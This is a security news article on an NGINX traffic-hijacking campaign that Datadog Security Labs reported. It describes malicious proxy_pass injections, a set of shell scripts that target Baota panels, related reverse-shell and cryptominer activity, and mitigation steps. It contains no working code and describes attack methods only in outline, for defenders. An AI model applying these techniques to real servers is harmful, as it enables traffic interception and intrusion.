Malicious NGINX Configurations Enable Large-Scale Web Traffic Hijacking Campaign

Cybersecurity researchers at Datadog Security Labs have uncovered an ongoing campaign where threat actors compromise NGINX web servers and Baota management panels to hijack legitimate web traffic. The attackers inject malicious configurations that silently redirect user requests through attacker-controlled infrastructure.

Attack Mechanism

The campaign leverages multiple shell scripts that modify NGINX configuration files to insert malicious location blocks. These blocks use the proxy_pass directive to intercept requests to specific URL paths and reroute them to domains operated by attackers. Security researcher Ryan Simon explained:

"The malicious configuration intercepts legitimate web traffic between users and websites and routes it through attacker-controlled backend servers. The campaign specifically targets Asian TLDs (.in, .id, .pe, .bd, .th), Chinese hosting infrastructure using Baota Panel, and government/education domains (.edu, .gov)."

Toolkit Breakdown

The multi-stage attack toolkit includes:

1. zx.sh: Orchestrates payload execution via curl/wget or raw TCP connections
2. bt.sh: Targets Baota Panel environments to overwrite NGINX configs
3. 4zdh.sh: Scans for common NGINX configuration locations
4. zdh.sh: Focuses on Linux/containerized NGINX instances with TLD targeting
5. ok.sh: Generates reports on active hijacking rules

Mitigation Steps

NGINX administrators should:

1. Audit configuration files for unauthorized proxy_pass directives
2. Monitor for unexpected processes modifying /etc/nginx/ paths
3. Restrict write access to NGINX configuration directories
4. Implement NIST-recommended container security practices for containerized deployments
5. Update Baota Panel installations to latest patched versions

Related Campaigns

This activity connects to broader exploitation patterns:

• React2Shell (CVE-2025-55182): 56% of exploitation attempts originate from two IP addresses (193.142.147[.]209, 87.121.84[.]24)
• Citrix ADC Reconnaissance: Parallel campaign using residential proxies to discover login panels

GreyNoise researchers noted:

"The dominant sources deploy distinct post-exploitation payloads: one retrieves cryptomining binaries from staging servers, while the other opens reverse shells directly to the scanner IP. This suggests interest in interactive access rather than automated resource extraction."

Organizations using NGINX should immediately review their web server configurations and implement strict change control procedures for critical infrastructure files.